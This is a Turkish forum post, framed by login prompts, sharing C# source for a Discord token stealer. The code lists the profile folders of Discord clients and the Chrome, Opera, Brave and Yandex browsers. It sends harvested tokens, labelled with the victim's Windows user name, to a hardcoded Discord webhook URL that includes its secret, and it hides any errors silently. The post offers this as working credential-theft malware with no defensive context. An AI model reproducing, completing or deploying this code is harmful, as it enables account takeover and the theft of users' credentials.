Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı ya da giriş yapmalısınız. Foruma üye olmak tamamen ücretsizdir.
private static readonly List<Service> _services = new List<Service>()
{
new Service("Discord", "Roaming\\Discord", false),
new Service("Discord Canary", "Roaming\\discordcanary", true),
new Service("Discord PTB", "Roaming\\discordptb", false),
new Service("Google Chrome", "Local\\Google\\Chrome\\User Data\\Default", false),
new Service("Opera", "Roaming\\Opera Software\\Opera Stable", true),
new Service("Brave", "Local\\BraveSoftware\\Brave-Browser\\User Data\\Default", true),
new Service("Yandex", "Local\\Yandex\\YandexBrowser\\User Data\\Default", true)
};
private static readonly string _hookUrl = "https://discordapp.com/api/webhooks/705202564152426538/4eUPeKubjaKf3lk83ccezz-fyuPq94zScZ1Ddk5vyNI8JstEDS_dUtd56jgLdeY7tMnn";
public static void ReportTokens(List<string> tokenReport)
{
try
{
HttpClient httpClient = new HttpClient();
Dictionary<string, string> dictionary = new Dictionary<string, string>()
{
{
"content",
"Token report for '" + Environment.UserName + "'\n\n" + string.Join("\n", (IEnumerable<string>) tokenReport)
},
{
"username",
"Token"
},
{
"avatar_url",
"https://cdn.discordapp.com/attachments/705202485307899914/705203163128528977/New_Project_1.png"
}
};
httpClient.PostAsync(Webhook._hookUrl, (HttpContent) new FormUrlEncodedContent((IEnumerable<KeyValuePair<string, string>>) dictionary)).GetAwaiter().GetResult();
}
catch
{
}
}
Forumdan daha fazla yararlanmak için giriş yapın veya kayıt olun!